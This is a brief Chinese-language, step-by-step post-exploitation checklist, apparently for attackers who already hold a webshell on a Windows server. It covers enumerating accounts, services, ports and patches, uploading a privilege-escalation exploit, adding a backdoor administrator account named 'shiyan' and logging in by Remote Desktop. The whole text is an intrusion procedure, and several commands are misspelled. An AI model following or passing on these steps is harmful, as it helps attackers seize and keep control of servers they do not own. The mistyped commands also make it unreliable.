1， whoami 查询当前用户，是否为最高权限。

2，net user 查看下该服务器是否已成万人骑。

3，ipconfig 查看服务器是否处于内网中。

4，net user shiyan shiyan/add 尝试是否能添加账号（假如不能）。

5，netstart 查看下开启了哪些服务。

6，Tasklist /svc 查看下当前都有哪些服务进程。  // 3389服务器名称：Terminal Services  //  查看 PID 编号

7，netstat -ano 查看端口开放状态 。     //  对照 PID 找到 3389 端口

（dama 里一般自带注册表读取打法，直接一键查看。）

8，systeminfo 查看下操作系统，型号，补丁情况。

9，对比补丁数，查找可用的提权 exp 。

10，找到可读可写的目录，而且保证目录里没有空格，然后把 exp 上传到该路径下 。

11，在 dama 里输入刚才上传的 exp 路径 ，然后再后面输入 "whoami" 查看下当前权限 。

12， C:\WINDOWS\tq.txt "net user shiyan shiyan/add"   添加账户。

13， C:\WINDOWS\tq.txt "net localgroup administrators shiyan /add"  添加到管理组。

14，在自己主机上输入  Win + R  ，然后输入 mstsec 进行登录。 // 如果 3389 未打开，可上传一个 3389 启动 exp ,同上。